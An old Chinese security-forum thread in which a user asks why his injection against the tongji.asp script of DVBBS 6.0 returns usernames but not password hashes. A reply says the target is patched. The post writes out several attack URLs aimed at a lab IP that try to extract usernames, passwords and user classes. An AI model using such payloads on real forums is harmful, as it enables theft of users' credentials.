|
 | 作者: Henung [henung]
 论坛用户 |
登录 |
| 我在测试动网论坛DVBBS 6.0的tongji.asp脚本漏洞功击时,为什么只可以查到用户,却查不到密码呢? 查用户的:http://192.168.130.134/tongji.asp?orders=2&N=2%20UserName?,(这个已经成功了,我已经查到了论坛上有什么用户) http://192.168.130.134/tongji.asp?orders=2&N=2%20userpassword,?(这个搞不定啊,输进去以后和原来一样,只有用户,没有见到有MD5加密过的密码,(如果这个问题我搞不明白,我会睡不着的)) http://192.168.130.134/tongji.asp?orders=2&N=2%20userclass,(这个也是一样的结果,什么原因,为什么人家一搞就成功了呢,而我却不是) |
| 地主 发表时间: 04-10-08 19:00 |
 | 回复: saman [saman] 论坛用户 |
登录 |
|
打了补丁了贝 |
| B1层 发表时间: 04-10-10 15:04 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 黑客进阶 标题: 请教动网论坛DVBBS6.0tongji.asp脚本漏洞功击......